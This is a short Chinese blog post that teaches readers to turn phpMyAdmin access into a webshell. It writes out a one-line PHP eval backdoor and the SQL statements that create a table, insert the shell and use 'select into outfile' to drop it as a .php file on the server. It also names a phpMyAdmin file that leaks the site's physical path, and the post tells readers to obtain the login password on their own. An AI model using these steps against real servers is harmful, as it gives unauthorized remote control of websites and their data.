mysql备份一句话
- 发表于
- 周边
很多时候我们拿到了PHPMYADMIN,现在如何利用PHPMYADMIN拿到WEBSHELL呢。有些朋友还不清楚。这里简要说一下:
利用PHPMYADMIN连上后,进入当前站点的数据库,然后建立一个表,名字可以随便写如cnyzy,但是字段数要写1,还要是TEXT类型的,以便于放入SHELL,创建成功了,点插入,写入一句话的木马:
1 |
<?php eval($_POST[cmd]);?> |
,在点最左上角的SQL来执行SQL语句,在弹出的对话窗中输入:
1 |
"select * from 'cnyzy' into outfile "d:\\web\\data\\cnyzy.php";" |
意思就是说把CNYZY中的结果输入到路径的CNYZY.PHP文件中。然后这个小马就生成了。在用客户端一连就OK了。
很简单。还不明白的朋友可以试试。不过有一点是要注意的,就是要有绝对的路径地址。
1.如何拿到登陆密码. 自己想办法
2.访问 : http://url/phpmyadmin/libraries/select_lang.lib.php 得到物理路径.
3.选择一个Database.运行以下语句。
1 2 3 4 |
Create TABLE a (cmd text NOT NULL); Insert INTO a (cmd) VALUES('<?php eval($_POST[1]);?>'); select cmd from a into outfile 'D:/phpMyAdmin/libraries/d.php'; Drop TABLE IF EXISTS a; |
4.如果没什么意外.对应网站得到webshell
原文连接:mysql备份一句话
所有媒体,可在保留署名、
原文连接
的情况下转载,若非则不得使用我方内容。